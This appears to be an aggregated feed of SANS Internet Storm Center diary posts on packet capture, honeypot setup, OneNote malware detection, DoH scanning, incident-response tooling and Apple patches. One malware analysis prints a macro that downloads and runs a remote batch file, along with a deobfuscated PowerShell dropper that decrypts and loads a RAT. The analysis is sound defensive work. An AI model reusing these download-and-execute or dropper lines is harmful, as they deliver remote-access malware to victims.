SANS

Subscribe to SANS hírcsatorna SANS
SANS Internet Storm Center - Cooperative Cyber Security Monitor
Frissítve: 8 perc 5 másodperc
2023. február 3.

VMware workstation 17.0.1 fixes arbitrary file deletion issue - https://www.vmware.com/security/advisories/VMSA-2023-0003.html, (Fri, Feb 3rd)

---------------
Jim Clausing, GIAC GSE #26
jclausing --at-- isc [dot] sans (dot) edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2023. február 3.

ISC Stormcast For Friday, February 3rd, 2023 https://isc.sans.edu/podcastdetail.html?id=8354, (Fri, Feb 3rd)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2023. február 3.

Check out a couple of my older posts, (Thu, Feb 2nd)

I don't get nearly as much opportunity to play with packets these days as I did in the first 5-10 years I was a handler and I miss it. I was looking back through some of my old diaries and realized that in the years since I wrote some of them, we have at least a generation of folks who have entered the field. So I thought that on (the day after) Groundhog Day, it might be time to point folks back to some stuff I wrote earlier. Note, some of the tools have changed/evolved, so ethereal is now wireshark and instead of hping3 I would probably use scapy, but here are 2 of my favorite diaries from the past. Check them out, [1] is from 2006 and [2] is from 2009.

[1] A TCP/IP mystery (solved)

[2] A packet challenge and how I solved it

---------------
Jim Clausing, GIAC GSE #26
jclausing --at-- isc [dot] sans (dot) edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2023. február 2.

ISC Stormcast For Thursday, February 2nd, 2023 https://isc.sans.edu/podcastdetail.html?id=8352, (Thu, Feb 2nd)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2023. február 2.

Rotating Packet Captures with pfSense, (Wed, Feb 1st)

Having a new pfSense firewall in place gives some opportunities to do a bit more with the device. Maintaining some full packet captures was an item on my "to do" list. The last 24 hours is usually sufficient for me since I'm usually looking at alerts within the same day. I decided to do rotating packet captures based on file size. This allows me to capture packets, saving files of a specific size and keeping a specified number of files. 

I'll be keeping files 1,000 MB (1 GB) in size and storing a total of 300,000 MB (300 GB) That means I'll be storing a rotation of 300 files. The packet captures are going to be performed using tcpdump [1], which comes preinstalled on pfSense.

tcpdump -ni igc3 -W 300 -C 1000 -w captures.pcap


Figure 1: tcpdump options for keeping a rotation of 300 files of packet captures 1GB in size

Running the command itself is relatively easy. I could use:

  • the Command Prompt [2] option within fpSense
  • the local console
  • an administrative SSH session

Any of these options work well, but don't help me with one thing: automation. I considered a variety of options here and ran into a solution from Olaf Schwarz. Olaf put together a great example of a script that could be used to help automate the process and using a package available in pfSense [3]. 

This solution uses Shellcmd and it can be installed from the pfSense Package Manager [4]. 

System --> Package Manager (search for "shellcmd")


Figure 2: Installation of Shellcmd using pfSense Package Manager

If I wanted to simply run the tcpdump command on startup I could just add it to Shellcmd. Shellcmd would take it from there and would initiate the command during the boot process. However, there are some benefits to the script created by Olaf that would allow me to easily start, stop or check the status of packet captures without rebooting the firewall to kick off the process. 

Some modifications to Olaf's script were made for my situation:

  • Using internal "live" storage and not externally mounted media
  • Using rotation settings for 1GB file captures and keeping last 300 files


FIgure 3: Highlights of script modifications for tcpdump

A subset of my changes is also available below. For the full script, check out Olaf's blog post [3].

#!/bin/sh # # Startup script for trdump via tcpdump # # description: trdump control script # processname: tcpdump PCAP=/data/captures.pcap SIZE=1000 COUNT=300 INTERFACE=igc3 PIDFILE=/var/run/tcpdump start() { if [ -f $PIDFILE ]; then echo "PID File $PIDFILE exists" exit 1 fi /usr/bin/logger "starting traffic dump" # if we reach the code here, our disk is mounted # start recording # -n Don't convert addresses (i.e., host addresses, port numbers, etc.) to names # -C 1000 -W 300 capture 300 files of 1000 MB; /usr/sbin/tcpdump -ni $INTERFACE -W $COUNT -C $SIZE -w $PCAP >/dev/null 2>&1 &

 

As outlined in Olaf's blog, I stored the file in /usr/local/trdump.sh and also enabled execution. Since i was going to be storing the captures in the root "data" directory, I also created that folder. 

chmod +x /usr/local/trdump.sh mkdir /data

If creating the file locally on the firewall from an SSH session, make sure to familiarize yourself with vi [5]. The only thing left to do is reference the script through Shellcmd. 

Services --> Shellcmd

Figure 4: Enter script command in Shellcmd package

The "start" command will run the command if tcpdump is not already started. In this case, I started just by running the command from an SSH session and then checked the status. 

/usr/local/trdump.sh start /usr/local/trdump.sh status


Figure 5: Output of tcpdump script "status" 

Checking the /data path shows the new PCAP files in the directory. 

Figure 6: Rotating PCAP files generated from script

It's recommended to keep PCAP files at or below 100MB in size since it can cause delays when reviewing files with tools such as Wireshark. In my case, I wasn't concerned since I wanted to store less files and could easily extract what I needed. For example, if I wanted to take a look at data only for my honeypot, one quick command can get me what I need. 

tcpdump -r /data/captures.pcap001 host 192.168.68.178 -w /data/filtered.pcap

Figure 7: Creating file of extracted PCAP data for a specific host

The new PCAP is much smaller and could easily be transferred to a different system or quickly viewed using tcpdump from the command line. 

tcpdump -r /data/filtered.pcap tcp port 80 -v | head -n 20


Figure 8: Using tcpdump to view traffic on TCP port 80

There are a lot of options to modify this setup, but gives some great opportunities to take a deep dive into network packet captures.

[1] https://linux.die.net/man/8/tcpdump
[2] https://docs.netgate.com/pfsense/en/latest/diagnostics/command-prompt.html
[3] https://www.00010111.at/blog/2017/06/27/add-traffic-recording-to-pfsense-easily/
[4] https://docs.netgate.com/pfsense/en/latest/packages/manager.html
[5] https://www.redhat.com/sysadmin/introduction-vi-editor

--
Jesse La Grew
Handler

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2023. február 1.

Detecting (Malicious) OneNote Files, (Wed, Feb 1st)

We are starting to see malicious OneNote documents (cfr. Xavier's diary entry "A First Malicious OneNote Document").

OneNote files have their own binary fileformat: [MS-ONESTORE].

A OneNote file starts with GUID {7B5C52E4-D88C-4DA7-AEB1-5378D02996D3}.

Files contained in a OneNote file start with a header (FileDataStoreObject) followed by the embedded file itself. This header also starts with a GUID: {BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC}.

Hence, to detect OneNote files with embedded files, look for files that start with byte sequence E4 52 5C 7B 8C D8 A7 4D AE B1 53 78 D0 29 96 D3 (that's GUID {7B5C52E4-D88C-4DA7-AEB1-5378D02996D3}) and contain one ore more instances of byte sequence E7 16 E3 BD 65 26 11 45 A4 C4 8D 4D 0B 7A 9E AC (that's GUID {BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC}).

This allows you to detect OneNote files with embedded files. Which are not necessarily malicious ... Because an embedded file can just be a picture, for example.

I have a bit more detail on the analysis of this format, in my blog post "Analyzing Malicious OneNote Documents".

Florian Roth developed YARA rules that look for these GUIDs, together with some typical malicious payloads: PE files, BAT files, VBS files, LNK files.

The trick is to look at the beginning of the embedded file, which can be found 36 bytes after the start of structure FileDataStoreObject (hence 36 bytes after each {BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC} guid).

If an embedded file starts with MZ, it's most likely an embedded Windows executable (but it could also be a text file that starts with MZ). If it starts with 4C 00 00 00, it's most likely an LNK file.

BAT and VBS files are harder to recognize, as they have no magic header: they can start with any byte sequence. Florian's rule uses a little heuristic: it identifies files that start with "@ECH" as BAT files (@ECHO OFF) and files that start with "on e" as VBS files (on error resume). Of course, this will not detect all malicious OneNote files, but we can never have perfect detection ...

Here is one of Florian's rules that detects a OneNote file with an embedded PE file ($x1):

Mostly as an exercise for myself, I created Suricata rules for onenote files. You can find them here, in my beta GitHub repository.

Caveat: these rules have not been tested in production, and the first rules detect any onenote file, with or without benign/malicious payload.

I'll provide more details on these Suricata rules in an upcoming blog post.

 

 

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2023. február 1.

ISC Stormcast For Wednesday, February 1st, 2023 https://isc.sans.edu/podcastdetail.html?id=8350, (Wed, Feb 1st)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2023. január 31.

Packet Tuesday: Large ICMP Errors https://www.youtube.com/watch?v=z9jk8Bbf4_o , (Tue, Jan 31st)

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2023. január 31.

DShield Honeypot Setup with pfSense, (Tue, Jan 31st)

Setting up a DShield honeypot is well guided by the installation script [1]. After several minutes of following the instructions and adding some custom details, the honeypot is up and running. What's needed after that is to expose the honeypot to the internet. I recently decided to update my home router and thought it was a great opportunity to dig into using pfSense [2]. To expose the honeypot using the pfsense, there are two main options to consider for NAT rules [3]:

  • 1:1 NAT
  • Port forwarding

This will help guide you through the process of implementing these NAT rules and testing connectivity to your honeypot, or any other device you may be exposing to an internal or external network. 

If you feel your settings are not taking effect, it may be due to the settings taking some time to apply. One way to attempt to get around this waiting period is forcing a Filter Reload. 

Status --> Filter Reload

Click "Reload Filter" to refresh the rules and see the status. 

Figure 1: Filter Reload status screen

Even if you are not having an issue with the speed of rule changes and how they are being applied, I highly recommend using the "Reload Filter" when removing NAT rules. I have noticed the behavior that the NAT rules appears to still function after removed, but have not timed now long it takes to apply without action. For me it was still functioning after 30 minutes of removing a rule and using the "Apply Changes" button. 

1:1 NAT

The 1:1 NAT will expose the entire honeypot to the internet. This is what most people are used to doing with the "DMZ" settings on a home router. It simply redirects all traffic hitting the public IP address to whatever address is specified on the internal network. This can also make things much easier if there are updates to the honeypot and an additional port needs to be exposed. As soon as it's exposed on the honeypot itself, there is no need to do anything further with the NAT rule. 

In order to set the 1:1 NAT, the settings can be found on Firewall --> NAT --> 1:1 (tab). Usually, the only thing required to enter into this section is the "Internal IP" and to set the description for the rule. Use the either of the green "Add" buttons near the bottom of the Rules screen to start the process of adding the new 1:1 NAT rule. 

Figure 2: 1:1 NAT rule settings

An interesting artifact of the 1:1 NAT is that it doesnot create any firewall rules so that external IP addresses can access any services from the public IP address and the honeypot exposed behind it. A new firewall rule needs to be created for the NAT.

Firewall --> Rules --> WAN (tab)

The source will be from whatever networks you will wan to be able to access the exposed IP. I put "any" since I will want this publicly facing from anywhere. Also remember to set the Protocol to "Any". Even though TCP services are the ones exposed and collecting data, there could be other data collection options available in the future. 

The destination IP for this rule will be your internal honeypot IP and not the WAN address. 

Figure 3: 1:1 NAT Firewall rule allowing all traffic

Connectivity to the honeypot using the external IP needs to be tested. The built in status script can help to give information on the health of the honeypot and if it is properly exposed.

sudo /srv/dshield/status.sh


Figure 4: Output of status.sh script showing webserver exposed to internet

Another way to test connectivity is to connect to your public IP address from another host, scan it with Nmap or use a service like Shodan [4]. I used the Shodan CLI to test connectivity. This utility is built into Kali and is very easy to use. In order to use this service, an API key is required [5]. 

shodan init <enter API key here> shodan info shodan scan submit <enter IP address or subnet to be scanned here>


Figure 5: Shodan scan output from Shodan CLI

Shodan may respond that the host was already scanned recently and it will not scan it again. If you submit the scan again, it may perform the scan and give you the results. Otherwise you may need to test using another option, such as curl or nmap from another computer outside of your network. 

curl -vv <enter public IP address> nmap <enter public IP address>


Figure 6: Curl output from port 80 of honeypot

These results also appear appropriate for the honeypot. It appears that it is exposed based on the NAT rule.

Determining Ports to Open

If you didn't want to fully expose the honeypot, another option is to create a variety of port forwards. The big question is which ports to forward to the honeypot. There are several ways to determine this from the honeypot. One is to look for listening ports on the honeypot to determine what to expose. Another is to review the local firewall ruleset and see what ports are made publicly available.

The listening ports on the honeypot can be quicky found using netstat. 

sudo netstat -tulpn | grep LISTEN


Figure 7: Using netstat to view listening ports

This shows a variety of ports open, including the internal SSH administration port (TCP 12222) a custom port that I had created (TCP 6889) and an unused SMTP port (TCP 25). From the look of things, there are only a few ports expoesd.

  • TCP 8000 (custom web port)
  • TCP 2223 (custom telnet port)
  • TCP 2222 (custom SSH port)

If we took this list, we would be missing a few things. While I could always run an nmap scan to view what ports to expose, it may also show other ports that should not be exposed, such as TCP 12222 which is used for internal SSH administration. Looking at the nftables [6]firewall rules is another good method. 

sudo cat /etc/network/ruleset.nft


Figure 8: Check firewall rules for ports to be exposed

Note that I am ignoring port 6889. This was a custom exposed port that I had put in place and didn't list in the standard ports that were being exposed at the time of this writing.

Based on the rules, important ports are:

  • 22 --> 2222
  • 23 --> 2223
  • 2323 --> 2223
  • 80 --> 8000
  • 7547 --> 8000
  • 5555 --> 8000
  • 9000 --> 8000

Redirected listeners:

  • 2222
  • 2223
  • 8000

This matches the previous Shodan scan, outside of TCP 5555. Taking a look at earlier Shodan data from the public IP did show this port as historically open. 


Figure 9: Results from historic Shodan data for open ports

At the very least, this gives a good idea for what ports to exposed through port forwarding.

Port Forwarding

The port forwarding option [7] will allow you to select specific ports that hit the public (WAN) interface to be redirected to the internal honeypot IP. Since we're implementing this for multiple ports, using a port Alias [8] will be very handy. We can create a collection of ports that we'll use for the port forwarding using one port forwarding rule. Otherwise, we would need to create multiple port forwarding rules, one for each port. 

Figure 10: Port aliases for honeypot ports

Once the port alias is defined for the honeypot ports to be exposed, the port forward rule can be created. 

Figure 11: Port forwarding rule using custom port alias

There are a variety of options when considering how to expose a device to the internet. In this case, my preference is the 1:1 NAT since I don't need to update the rule on a regular basis. 


[1] https://isc.sans.edu/honeypot.html
[2] https://www.pfsense.org/
[3] https://docs.netgate.com/pfsense/en/latest/nat/index.html
[4] https://www.shodan.io/
[5] https://help.shodan.io/the-basics/on-demand-scanning
[6] https://wiki.nftables.org/wiki-nftables/index.php/Quick_reference-nftables_in_10_minutes
[7] https://docs.netgate.com/pfsense/en/latest/nat/port-forwards.html
[8] https://docs.netgate.com/pfsense/en/latest/firewall/aliases.html

--
Jesse La Grew
Handler

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2023. január 31.

ISC Stormcast For Tuesday, January 31st, 2023 https://isc.sans.edu/podcastdetail.html&#x3f;id=8348, (Tue, Jan 31st)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2023. január 30.

Decoding DNS over HTTP(s) Requests, (Mon, Jan 30th)

I have written before about scans for DNS over HTTP(s) (DoH) servers. DoH is now widely supported in different browsers and recursive resolvers. It has been an important piece in the puzzle to evade various censorship regimes, in particular, the "Big Chinese Firewall". Malware has at times used DoH, but often uses its own HTTP(s) based resolvers that do not necessarily comply with the official DoH standard.

Just today, one of our honeypots received the following requests from various IPs:

GET /?dns=DUIBAAABAAAAAAAABWJhaWR1A2NvbQAAAQAB HTTP/1.1
GET /dns-query?dns=DUIBAAABAAAAAAAABWJhaWR1A2NvbQAAAQAB HTTP/1.1
GET /doh?dns=DUIBAAABAAAAAAAABWJhaWR1A2NvbQAAAQAB HTTP/1.1
GET /doh/family-filter?dns=DUIBAAABAAAAAAAABWJhaWR1A2NvbQAAAQAB HTTP/1.1
GET /doh/secure-filter?dns=DUIBAAABAAAAAAAABWJhaWR1A2NvbQAAAQAB HTTP/1.1
GET /query?dns=DUIBAAABAAAAAAAABWJhaWR1A2NvbQAAAQAB HTTP/1.1
GET /resolve?dns=DUIBAAABAAAAAAAABWJhaWR1A2NvbQAAAQAB HTTP/1.1

The different URLs correspond to various common implementations of DoH. The most common default appears to be "/dns-query" (BIND and Unbound). This is also the endpoint used by the RFC. Some DNS servers (for example, Power DNS) use "/" as the default. 

The payload is a Base64 encoded DNS message:

00000000: 0d42 0100 0001 0000 0000 0000 0562 6169  .B...........bai
00000010: 6475 0363 6f6d 0000 0100 01              du.com.....

0d42 - Query ID
0100 - Recursion desired flag set
0001 - One Query
0000 - No Answers
0000 - No Authority Records
0000 - No Additional Records
0562 6169 6475 0363 6f6d 00 baidu.com
0001 - Internet Zone
0001 - A Records

So in short: An "A" records query for baidu.com. If you see any requests like this in your logs: Don't worry about it too much. I wouldn't consider it some simple recognizance. They are unlikely to "attack" your server even if you have a DNS over HTTPS resolver running. However, they may use it to anonymize their requests which may also trigger some alerts if they are attempting to look up suspect hostnames. This traffic may also lead to resource issues if you have a smaller server.

I did earlier today add DoH responses to some of my honeypots, so we will see if anything changes.

 

---

Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2023. január 30.

ISC Stormcast For Monday, January 30th, 2023 https://isc.sans.edu/podcastdetail.html&#x3f;id=8346, (Mon, Jan 30th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2023. január 27.

ISC Stormcast For Friday, January 27th, 2023 https://isc.sans.edu/podcastdetail.html&#x3f;id=8344, (Fri, Jan 27th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2023. január 27.

Live Linux IR with UAC, (Thu, Jan 26th)

 

The other day, I was looking for Linux IR scripts and ran across the tool Unix-like Artifacts Collector or UAC(1) created by Thiago Lahr.  As you would expect, it gathers most live stats but also collects Virtual box and Docker info and other data on the system. It can dump results files to SFTP, Azure, S3, and IBM storage natively. 

 

With any tool, you should always test to understand how it affects your system. I ran a simple file timeline collection before and after to see what changes were made. 

#git clone https://github.com/tclahr/uac.git

#mac-robber / >before

#uac -a live_response ../

#mac-robber / > after

 

As expected, files on the system have their access time updated when the tool reads files. Some tools do reset the access times back, but this one does not. It would be best if you collected file times before running the rest of the script. You can specify this via the command line

#uac -a bodyfile/bodyfile.yaml, live_response/\*. .

 

The results are a tar.gz file; when extracted, they have artifacts in the below folder structure.

 

To see what commands it uses to gather data, you can drop into one of the folders under live response and look at at the yml files. 

#cd /tmp/usb/uac/artifacts/live_response/containers 

#grep 'command:' docker.yaml

 

 

You can also create a super timeline with the data that it collected with a Plaso docker(2). If you do a full collection, it also grabs copies of files in the "Root" dir and the file system line in the bodyfile dir. 

 

 

UAC can also dump memory

#./uac -a memory_dump/avml.yaml

 

Its a potent tool that acts as an IR collection "swiss army knife". You can create a collection profile and customize lots of things. Before you add it to your bag of tools, you should test it in many situations and understand its limitations and usage. After more testing and comfort with it, I plan on adding it to my group of collection tools. 

 

Are you using another IR script that you like? Have you rolled your own? Let me know in the comments.  

 

(1) https://github.com/tclahr/uac

(2) https://tclahr.github.io/uac-docs/super_timeline/

 

--

Tom Webb 

@tom_webb@infosec.exchange

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2023. január 26.

ISC Stormcast For Thursday, January 26th, 2023 https://isc.sans.edu/podcastdetail.html&#x3f;id=8342, (Thu, Jan 26th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2023. január 25.

A First Malicious OneNote Document, (Wed, Jan 25th)

Attackers are always trying to find new ways to deliver malware to victims. They recently started sending Microsoft OneNote files in massive phishing campaigns[1]. OneNote files (ending the extension ".one") are handled automatically by computers that have the Microsoft Office suite installed. Yesterday, my honeypot caught a first sample. This is a good opportunity to have a look at these files. The file, called "delivery-note.one", was delivered as an attachment to a classic phishing email:

The attacker used a simple trick to hide suspicious elements: The script linked to the "Click to view document" PNG picture is just... behind this picture! Funny to mention, the script name contains a weird character:

remnux@remnux:/MalwareZoo/20230124$ ll t* total 273 drwxr-xr-x 1 501 dialout 352 Jan 24 01:57 ./ drwxr-xr-x 1 501 dialout 4992 Jan 24 00:54 ../ -rwxr-xr-x 1 501 dialout 1703 Jan 24 01:50 temp?eno.hta* remnux@remnux:/MalwareZoo/20230124$ file tem?eno.hta tempsrotanimret enil FLRC htiw , txet IICSA ,tnemucod LMTH : ath.one

As you can see, the filename contains a control character that alters the console output :-)

temp<202e>eno.hta: HTML document, ASCII text, with CRLF line terminators

The file contains the VBS macro that will perform the malicious actions. In the meantime, Didier wrote a new tool to analyze (and extract data) from OneNote files. The tool is called like all Didiers's tools: onedump.py[2]. It is still in beta but already does a great job:

remnux@remnux:/MalwareZoo/20230124$ ./onedump.py delivery-report.one File: delivery-report.one 1: 0x000022e8 .PNG 89504e47 0x00000147 9cc9eb32f6ed4a3cef2e62e258895f95 2: 0x00002588 ..<! 0d0a3c21 0x000006a7 cf8d9fcdfdc57816f71c7858d791352f 3: 0x00003230 .PNG 89504e47 0x0000145d ddb6da5a6385b9a062409e605c66f682

Steam number 2 looks the most interesting one (starting with "<!"). Let's dump it, and it's indeed the file that I extracted manually:

remnux@remnux:/MalwareZoo/20230124$ ./onedump.py delivery-report.one -s 2 -d >payload2.hta

The HTA file is not obfuscated at all and is easy to analyze. The most important code is this one:

Sub AutoOpen() ExecuteCmdAsync "cmd /c powershell Invoke-WebRequest -Uri https://www.onenotegem.com/uploads/soft/one-\   templates/the_daily_schedule.one -OutFile $env:tmp\invoice.one; Start-Process -Filepath $env:tmp\invoice.one" ExecuteCmdAsync "cmd /c powershell Invoke-WebRequest -Uri https://transfer.sh/get/DdAbds/window.bat -OutFile \   $env:tmp\system32.bat; Start-Process -Filepath $env:tmp\system32.bat" End Sub

The first ExecuteCmdAsync() will download a simple note that is not malicious and open it. Probably to make the victim happy and confident that the first note is legit. 

The second execution will fetch and execute a Windows .bat file. This one is nicely obfuscated:

@echo off set "JPZP=set " %JPZP%"IbCwXoVeuS=st" %JPZP%"EDdachcxsu=co" %JPZP%"JcCljvtvxr=nd" %JPZP%"YbFfFTKUTq=do" %JPZP%"zvSrMqnEdP=s\" %JPZP%"zVLVxWvHnO=py" %JPZP%"wVwufyXxrS=we" %JPZP%"WgLLiMRuoi=.e" %JPZP%"RqGZoaKZAe=ex" %JPZP%"OEdsMkxhlk="%~0." %JPZP%"HchdqIWNWd=xe" %JPZP%"vikkHukEfD=in" %JPZP%"msPLCkdRjQ=0\"

This snippet of the script will help you to understand how it works: A lot of environment variables are created and, below, concatenated to build commands. If it's difficult to read, it's easy to deobfuscate. Just add a bunch of "echo" at the beginning of all lines at the bottom of the file and execute it. Here is the generated code (beautified):

copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /y "test.bat.exe" cls cd "C:\Users\REM\Desktop\" "test.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $hfShb = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\REM\Desktop\test.bat').Split([Environment]::NewLine); foreach ($TIZnc in $hfShb) {   if ($TIZnc.StartsWith(':: '))   {   $OPowf = $TIZnc.Substring(3); break;   }; }; $kJJdx = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($OPowf); $xypSr = New-Object System.Security.Cryptography.AesManaged; $xypSr.Mode = [System.Security.Cryptography.CipherMode]::CBC; $xypSr.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7; $xypSr.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Cao+K/bvGpiu3YwMcce0n/wD4E4gfQmkj3F2tfn9rZk='); $xypSr.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lAK9B8Af6zbgofnvIf4zYQ=='); $wkMnt = $xypSr.CreateDecryptor(); $kJJdx = $wkMnt.TransformFinalBlock($kJJdx, 0, $kJJdx.Length); $wkMnt.Dispose(); $xypSr.Dispose(); $XQlHS = New-Object System.IO.MemoryStream(, $kJJdx); $CoXOG = New-Object System.IO.MemoryStream; $AbQce = New-Object System.IO.Compression.GZipStream($XQlHS, [IO.Compression.CompressionMode]::Decompress); $AbQce.CopyTo($CoXOG); $AbQce.Dispose(); $XQlHS.Dispose(); $CoXOG.Dispose(); $kJJdx = $CoXOG.ToArray(); $MnaeK = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($kJJdx); $INAif = $MnaeK.EntryPoint;$INAif.Invoke($null, (, [string[]] (''))) exit /b

Did you see the next obfuscation technique? Interesting strings are reversed:

('gnirtS46esaBmorF'[-1..-16] -join '')

This script is a dropper. The payload is located in the file and read by PowerShell. It is identified by lines starting with ":: ":

foreach ($TIZnc in $hfShb) {   if ($TIZnc.StartsWith(':: '))   {   $OPowf = $TIZnc.Substring(3); break;   }; };

The payload is AES encrypted. Let's decrypt it with CyberChef:

The decrypted PE file (SHA256:ee1713429991c75fb6d53b6ed6dd0296ae7889a86c85b55d20a782c332948b7a) is unknown on VT. It's an ASyncRAT and tries to connect to wormxwar[.]ddns[.]net as C2...

[1] https://www.bleepingcomputer.com/news/security/hackers-now-use-microsoft-onenote-attachments-to-spread-malware/
[2] https://blog.didierstevens.com/2023/01/22/new-tool-onedump-py/

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2023. január 25.

ISC Stormcast For Wednesday, January 25th, 2023 https://isc.sans.edu/podcastdetail.html&#x3f;id=8340, (Wed, Jan 25th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2023. január 24.

And yet another packet Tuesday. Sticking with IPv6 for this episode: Neighbor Discovery&&#x23;x21; https://www.youtube.com/watch&&#x23;x3f;v=CoaZjuuY1do &#x23;ipv6 &#x23;packetlife &#x23;pcaps &#x23;inpcapswetrust &#x23;packettuesday, (Tue, Jan 24th)

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2023. január 24.

Apple Updates (almost) Everything: Patch Overview, (Tue, Jan 24th)

Apple yesterday released its usually set of updates across its entire portfolio of operating systems. Some issues of note:

  • The update includes a patch for CVE-2022-42856 for iOS 12.5. This will help users of older Apple devices going back to the iPhone 5s. More recent operating systems received this patch in December.
  • tvOS is missing. I expect a tvOS update soon to address some of the vulnerabilities.
  • I do not see updates for git. Git last week patched some vulnerabilities; likely too late to be included in this update.
Safari 16.3 iOS 12.5.7 macOS Monterey 12.6.3 macOS Big Sur 11.7.3 watchOS 9.3 iOS 15.7.3 and iPadOS 15.7.3 iOS 16.3 and iPadOS 16.3 macOS Ventura 13.2 CVE-2023-23496 [critical] WebKit
The issue was addressed with improved checks.
Processing maliciously crafted web content may lead to arbitrary code execution x       x   x x CVE-2023-23518 [critical] WebKit
The issue was addressed with improved memory handling.
Processing maliciously crafted web content may lead to arbitrary code execution x   x x x   x x CVE-2023-23517 [critical] WebKit
The issue was addressed with improved memory handling.
Processing maliciously crafted web content may lead to arbitrary code execution x   x x x   x x CVE-2022-42856 [critical] *** EXPLOITED *** WebKit
A type confusion issue was addressed with improved state handling.
 Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.1.   x             CVE-2023-23499 [important] AppleMobileFileIntegrity
This issue was addressed by enabling hardened runtime.
An app may be able to access user-sensitive data     x x x   x x CVE-2022-42915 [other] curl
Multiple issues were addressed by updating to curl version 7.86.0.
Multiple issues in curl     x         x CVE-2022-42916 [other] curl
Multiple issues were addressed by updating to curl version 7.86.0.
Multiple issues in curl     x         x CVE-2022-32221 [other] curl
Multiple issues were addressed by updating to curl version 7.86.0.
Multiple issues in curl     x         x CVE-2022-35260 [other] curl
Multiple issues were addressed by updating to curl version 7.86.0.
Multiple issues in curl     x         x CVE-2022-35252 [other] curl
Multiple issues were addressed by updating to curl version 7.85.0.
Multiple issues in curl     x x         CVE-2023-23513 [critical] dcerpc
A buffer overflow issue was addressed with improved memory handling.
Mounting a maliciously crafted Samba network share may lead to arbitrary code execution     x x       x CVE-2023-23493 [other] DiskArbitration
A logic issue was addressed with improved state management.
An encrypted volume may be unmounted and remounted by a different user without prompting for the password     x         x CVE-2022-32915 [important] DriverKit
A type confusion issue was addressed with improved checks.
An app may be able to execute arbitrary code with kernel privileges     x           CVE-2023-23507 [important] Intel Graphics Driver
The issue was addressed with improved bounds checks.
An app may be able to execute arbitrary code with kernel privileges     x         x CVE-2023-23504 [important] Kernel
The issue was addressed with improved memory handling.
An app may be able to execute arbitrary code with kernel privileges     x   x x x x CVE-2023-23502 [other] Kernel
An information disclosure issue was addressed by removing the vulnerable code.
An app may be able to determine kernel memory layout     x   x   x x CVE-2023-23497 [important] PackageKit
A logic issue was addressed with improved state management.
An app may be able to gain root privileges     x x       x CVE-2023-23505 [other] Screen Time
A privacy issue was addressed with improved private data redaction for log entries.
An app may be able to access information about a user’s contacts     x x x x x x CVE-2023-23511 [important] Weather
The issue was addressed with improved memory handling.
An app may be able to bypass Privacy preferences     x   x   x x CVE-2023-23508 [important] Windows Installer
The issue was addressed with improved memory handling.
An app may be able to bypass Privacy preferences     x x       x CVE-2023-23519 [other] ImageIO
A memory corruption issue was addressed with improved state management.
Processing an image may lead to a denial-of-service         x   x x CVE-2023-23500 [important] Kernel
The issue was addressed with improved memory handling.
An app may be able to leak sensitive kernel state         x x x x CVE-2023-23503 [important] Maps
A logic issue was addressed with improved state management.
An app may be able to bypass Privacy preferences         x x x x CVE-2023-23512 [other] Safari
The issue was addressed with improved handling of caches.
Visiting a website may lead to an app denial-of-service         x   x x CVE-2023-23498 [other] Mail Drafts
A logic issue was addressed with improved state management.
The quoted original message may be selected from the wrong email when forwarding an email from an Exchange account           x x x CVE-2023-23506 [important] libxpc
A permissions issue was addressed with improved validation.
An app may be able to access user-sensitive data               x CVE-2023-23510 [other] Safari
A permissions issue was addressed with improved validation.
An app may be able to access a user’s Safari history               x CVE-2022-3705 [other] Vim
A use after free issue was addressed with improved memory management.
Multiple issues in Vim               x CVE-2023-23501 [important] Wi-Fi
The issue was addressed with improved memory handling.
An app may be able to disclose kernel memory               x

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

